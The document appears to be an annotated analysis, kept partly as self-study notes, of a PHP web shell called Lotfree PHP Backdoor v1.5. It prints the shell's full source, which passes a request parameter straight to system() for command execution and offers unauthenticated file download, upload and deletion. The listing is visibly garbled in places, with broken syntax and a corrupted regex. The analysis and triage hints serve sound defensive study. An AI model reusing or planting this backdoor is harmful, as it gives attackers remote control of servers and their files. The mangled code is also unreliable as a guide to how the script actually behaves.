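PHP Backdoor Version 1.5 is a PHP backdoor (web shell) written by Sirius_black of the lotfree team. This is a brief analysis of it, kept partly as self-study notes on PHP. The backdoor's main function is command execution: depending on the privileges of the account under which the web server and PHP were installed, it can run operating system commands, and if that account is an administrator it can execute all kinds of operating system commands. Besides command execution, the listing below also browses directories and downloads, uploads and deletes files, each driven directly by request parameters, with no authentication visible in the code shown. The annotated listing of the backdoor follows.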
-
-
// Good_link: path normaliser applied to the dir parameter and to uploaded file names.
// Steps, in order: collapse runs of "/" into one; apply a second pattern that is garbled on
// this page and appears intended to fold a "/name/.." pair into "/" (TODO confirm against the
// original file); collapse "/" runs again; drop a leading "./" when something follows it;
// fall back to "." when the result is empty.
// NOTE(review): this only tidies the string. Nothing here anchors the result to a base
// directory, so it should not be read as a path-traversal check.
// ereg_replace() belongs to PHP's POSIX regex extension (deprecated in PHP 5.3, removed in
// PHP 7.0), which helps date the script when triaging a sample.
- function Good_link ($link)
- {
- $link =ereg_replace ("/+", "/", $link);
- $link =ereg_replace ("/[^/(..)") +/\.\. ","/", $link);
- $link =ereg_replace ("/+", "/", $link);
- if (!strncmp ($link, "./", 2) && strlen ($link) >2) $link =substr ($link, 2);
- if ($link = = "") $link = ".";
- return $link;
- }
- $_REQUEST is used to obtain the data submitted to this script
// Directory selection: dir is taken straight from the request (default ".") and is only
// normalised by good_link. opendir() and ChDir() then act on whatever path results, so every
// later relative file operation in the script happens inside the requester-chosen directory.
// No restriction to the script's own directory or to the web root is visible here.
- $dir =isset ($_request[' dir '])? $_request[' dir ']: "."; If Dir,dir is not defined, the default value "."
- $dir =good_link ($dir);
- $rep =opendir ($dir); Open DIR-Specified path handle
- ChDir ($dir); Switch to DIR-specified directory
// File download: when the down request parameter is non-empty, the named file is streamed
// back as an attachment by ReadFile() and the script exits.
// NOTE(review): no validation of the value is visible. BaseName() is applied only to the
// file name placed in the Content-Disposition header, not to the path that is actually read,
// so any file readable by the PHP process is exposed to whoever can reach this script.
- if (Isset ($_request["]) &&$_request[" Down "]!=" ")//if the down is defined
- {
- Header ("Content-type:application/octet-stream");
- Header ("Content-length:". FileSize ($_request["Down"));
- Header ("content-disposition:attachment; Filename= ". BaseName ($_request[" Down "));
- ReadFile ($_request["Down"]); To read a file to a buffer
- Exit ();
- }
- ?>
- Lotfree PHP Backdoor v1.5, easy to trace network yeetrack.com
-
- echo "The current absolute path is: ". GETCWD (). "
\ n "; Gets the current absolute path
- echo "dir = ' $dir '
\ n ";
- echo "Current directory, file list!
\ n ";
- If you have entered a command to execute
// Command execution: a non-empty cmd request value is handed to System() unchanged and the
// command's output is written into the response page. This is the core of the backdoor; the
// command runs with the privileges of the account the web server / PHP runs as.
// For triage: a request parameter flowing directly into system() is the pattern to search
// for in web-root files, and cmd= values in the access log show what was run through it
// when the parameter was sent in the query string.
- if (isset ($_request[' cmd ')) &&$_request[' cmd ']!= "")
- {
- echo "
\ n ";
- System ($_request[' cmd '); Executes the input command on the server, performs a result echo
- echo "
\ n ";
- }
- If you have already uploaded the file
// File upload: saves the posted file "fic" into the current directory (the one selected by
// the earlier ChDir call).
// NOTE(review): max_file_size is read from $_POST, so the size limit being enforced is
// supplied by the requester rather than fixed by the server. The client-supplied file name
// is only passed through good_link; no check of file type or extension is visible, so the
// upload can place further script files wherever the PHP process may write.
- if (Isset ($_files["fic" ["Name"]) && isset ($_post["max_file_size"))//Get POST file, save to current directory
- {
- if ($_files["fic" ["Size"]<$_post["max_file_size"])//Determine if the file conforms to the size specification
- {
- if (Move_uploaded_file ($_files["fic"] ["Tmp_name"],good_link ("./". $_files["fic" ["Name"])))//Save temporary files to the current directory
- {
- echo "File saved successfully". Good_link ("./". $_files["fic" ["Name"]). "!
\ n ";
- }
- else echo "File upload failed:". $_files["FIC" ["Error"]. "
\ n ";
- }
- else echo "File too large (files exceeding size limit)!
\ n ";
- }
// File deletion: a non-empty rm request value is passed directly to unlink() and the outcome
// is echoed. No validation of the value is visible, so any file the PHP process is allowed
// to remove can be deleted through this script.
- if (Isset ($_request[' rm ')) &&$_request[' rm ']!= "")//if RM is defined, the specified file is deleted
- {
- if (unlink ($_request[' rm '))//unlink is a php delete file function
- echo "successfully deleted". $_request[' RM ']. "!
\ n ";
- else echo "Delete file failed
\ n ";
- }
- ?>
-
-
-
-
- $t _dir=array ();
- $t _file=array ();
- $i _dir=0;
- $i _file=0;
- Before the display loop, read the directory entries and place them in $t_dir (directories) and $t_file (files)
// Split the entries of the directory handle opened earlier into two arrays: directories go
// to $t_dir, everything else to $t_file. Is_dir() is given the bare entry name, so it is
// resolved against the working directory, which the earlier ChDir call set to $dir.
// The handle is closed once every entry has been read.
- while ($x =readdir ($rep))
- {
- if (Is_dir ($x))//If the directory is currently being processed
- $t _dir[$i _dir++]= $x;
- else//If the file is currently being processed
- $t _file[$i _file++]= $x;
- }
- Closedir ($REP); Close a directory handle opened by Opendir
- while (1)//loop to enter the directory and file for the current path
- {
- ?>
-
-
- if ($x =each ($t _dir))
- {
- $name = $x ["Value"]; Gets the directory name in the T_dir array
- if ($name = = '. ') {}
- ElseIf ($name = = ' ... ') echo "Up (parent directory)
\ n "; Show an up link to read the list of files in the parent directory
- Else
- echo "". $name. " \ n ";
- }
- ?>
|
|
- $_SERVER['PHP_SELF'] gets the current PHP script's file name
- if ($y =each ($t _file))
- {
- if ($y ["Key"]%2==0)//If key is currently being processed
- echo "bgcolor= ' LightGreen ' >\n";
- else//If value is currently being processed, that is, the file. The file is displayed and a download link is provided.
- echo ">\n";
- echo "". $y ["Value"]. " \ n ";
- }
- else echo ">\n";
- ?>
|
- if ($y)
- {
- If this is a file, provide the following link to delete the file
- if ($y ["Key"]%2==0) echo "bgcolor= ' LightGreen '";
- echo ">Del";
- }
- else echo ">\n";
- ?>
- if (! $x &&! $y)
- Break
- }
- ?>
- ? dir= ">revenirau repertoire d ' Origine
-
- Upload file to server current directory:
|